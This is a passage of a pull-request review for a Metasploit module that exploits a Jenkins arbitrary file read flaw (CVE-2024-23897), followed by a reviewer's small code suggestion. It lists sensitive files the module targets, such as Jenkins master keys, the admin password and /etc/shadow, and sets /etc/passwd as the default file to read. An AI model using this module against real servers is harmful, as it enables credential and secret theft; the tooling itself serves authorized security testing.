modules/auxiliary/gather/jenkins_cli_ampersand_arbitrary_file_read.rb

```diff
@@ -0,0 +1,300 @@
+          * /var/jenkins_home/secret.key
+          * /var/jenkins_home/secrets/master.key
+          * /var/jenkins_home/secrets/initialAdminPassword
+          * /etc/passwd
+          * /etc/shadow
+          * Project secrets and credentials
+          * Source code, build artifacts
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Yaniv Nizry', # discovery
+          'binganao', # poc
+          'h4x0r-dz', # poc
+          'Vozec' # poc
+        ],
+        'References' => [
+          [ 'URL', 'https://www.jenkins.io/security/advisory/2024-01-24/'],
+          [ 'URL', 'https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/'],
+          [ 'URL', 'https://github.com/binganao/CVE-2024-23897'],
+          [ 'URL', 'https://github.com/h4x0r-dz/CVE-2024-23897'],
+          [ 'URL', 'https://github.com/Vozec/CVE-2024-23897'],
+          [ 'CVE', '2024-23897']
+        ],
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2024-01-24',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE ],
+          'Reliability' => [ ],
+          'SideEffects' => [ ]
+        },
+        'DefaultOptions' => {
+          'RPORT' => 8080,
+          'HttpClientTimeout' => 3 # very quick response, so set this low
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path for Jenkins', '/']),
+        OptString.new('FILE_PATH', [true, 'File path to read from the server', '/etc/passwd']),
+      ]
+    )
+    register_advanced_options(
+      [
+        OptFloat.new('DELAY', [true, 'Delay between first and second request', 0.5]),
+        OptString.new('ENCODING', [true, 'Encoding to use for reading the file', 'UTF-8']),
+        OptString.new('LOCALITY', [true, 'Locality to use for reading the file', 'en_US'])
+      ]
+    )
+  end
+
+  # Returns the Jenkins version. taken from jenkins_cred_recovery.rb, upgraded to work with newer versions
+  #
+  # @return [String] Jenkins version.
+  # @return [NilClass] No Jenkins version found.
+  def get_jenkins_version
+    uri = normalize_uri(target_uri.path)
+    res = send_request_cgi({ 'uri' => uri })
+
+    unless res
+      fail_with(Failure::Unknown, 'Connection timed out while finding the Jenkins version')
+    end
+
+    # shortcut for new versions such as 2.426.2 and 2.440
+    return res.headers['X-Jenkins'] if res.headers['X-Jenkins']
+
+    html = res.get_html_document
+    version_attribute = html.at('body').attributes['data-version']
+    version = version_attribute ? version_attribute.value : ''
+    version.scan(/jenkins-([\d.]+)/).flatten.first
+  end
+
+  def check
+    version = get_jenkins_version
+
+    return Exploit::CheckCode::Safe('Unable to determine Jenkins version number') if version.nil? || version.blank?
```

Comment:
The `#blank?` method will also evaluate to true when `version` is nil so you don't need to check if it's nil here.
```suggestion
    return Exploit::CheckCode::Safe('Unable to determine Jenkins version number') if version.blank?
```